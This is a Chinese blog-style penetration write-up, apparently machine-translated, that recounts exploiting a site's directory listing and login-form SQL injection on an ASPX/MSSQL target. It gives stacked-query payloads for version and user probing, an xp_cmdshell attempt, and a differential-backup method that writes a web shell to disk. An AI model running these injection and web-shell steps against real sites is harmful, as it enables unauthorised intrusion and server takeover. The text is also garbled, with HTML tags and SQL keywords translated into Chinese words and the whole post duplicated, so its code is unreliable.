0 x00前言
<人力资源/>扫描器扫到了某个网站存在目录浏览,于是便有了本文…
知识点科普:
1。目录浏览h5>
目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,* * *者如果知道其中目录名,则可以查看到这些目录下的文件。
引用>
2。差异备份条件
<李>站点绝对路径李>
<李>具有路径写入权限李>
<李>具备当前数据库权限李>
引用>
0 x01正文
<人力资源/>
站点配置不当,导致目录浏览,通过查看首页的源代码,翻到了几个目录
但是通常目录下的文件是需要传递参数去执行的,我们并不知道参数名,所以并没办法利用
<人力资源/>
辗转后到前台登录界面查看
那么前面登录口处存在注入,后台一般也有很多注入的啦,尝试找一下,如果有的话,配合绝对路径可以进行getshell
okok,发现注入啦,但到目前为止并不知道数据库是什么类型,一般aspx +该软件,由于前面发现是可以报错的,那么尝试使用该软件的报错方式
<代码> %’,1=@@version——代码>
该数据库,查看一下当前的用户身份
<代码> % ',1=用户——代码>
dbo的权限并不是sa尝试一下xp_cmdshell
<代码> %’;exec(“主. .xp_cmdshell whoami”)——一个代码>
并没有开启xp_cmdshell,且dbo的权限是不足以开启xp_cmdshell的,那么只能尝试使用差异备份的方式来写入一个网站管理权限
1。获取当前数据库名称
<代码> %’,1=db_name()——一个代码>
2。对当前数据库进行备份
<代码> %’;备份数据库数据库名称到磁盘='绝对路径与初始化——代码>
如果成功备份,则网页返回%’的查询结果(因为是堆叠且后面语句的执行并不会有返回结果)
3。创建表格,并写入网站管理权限h5> <代码> %’;创建表cmd(形象)
%’;插入cmd (a)值(0 xxxxx)——//网站管理权限的十六进制值代码>
可以用网上的工具,笔者用以前自己开发的小工具
4。进行第二次备份
<代码> %’;备份日志数据库名称到磁盘='绝对路径\ \ abc.aspx”——一次差异备份拿壳过程
目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,* * *者如果知道其中目录名,则可以查看到这些目录下的文件。
引用>
2。差异备份条件
<李>站点绝对路径李> <李>具有路径写入权限李> <李>具备当前数据库权限李>
引用>0 x01正文
<人力资源/>站点配置不当,导致目录浏览,通过查看首页的源代码,翻到了几个目录
但是通常目录下的文件是需要传递参数去执行的,我们并不知道参数名,所以并没办法利用
<人力资源/>辗转后到前台登录界面查看
那么前面登录口处存在注入,后台一般也有很多注入的啦,尝试找一下,如果有的话,配合绝对路径可以进行getshell
okok,发现注入啦,但到目前为止并不知道数据库是什么类型,一般aspx +该软件,由于前面发现是可以报错的,那么尝试使用该软件的报错方式
<代码> %’,1=@@version——代码>
该数据库,查看一下当前的用户身份
<代码> % ',1=用户——代码>
dbo的权限并不是sa尝试一下xp_cmdshell
<代码> %’;exec(“主. .xp_cmdshell whoami”)——一个代码>
并没有开启xp_cmdshell,且dbo的权限是不足以开启xp_cmdshell的,那么只能尝试使用差异备份的方式来写入一个网站管理权限
1。获取当前数据库名称
<代码> %’,1=db_name()——一个代码>
2。对当前数据库进行备份
<代码> %’;备份数据库数据库名称到磁盘='绝对路径与初始化——代码>如果成功备份,则网页返回%’的查询结果(因为是堆叠且后面语句的执行并不会有返回结果)
3。创建表格,并写入网站管理权限h5>
<代码> %’;创建表cmd(形象) %’;插入cmd (a)值(0 xxxxx)——//网站管理权限的十六进制值代码>可以用网上的工具,笔者用以前自己开发的小工具
4。进行第二次备份
<代码> %’;备份日志数据库名称到磁盘='绝对路径\ \ abc.aspx”——一次差异备份拿壳过程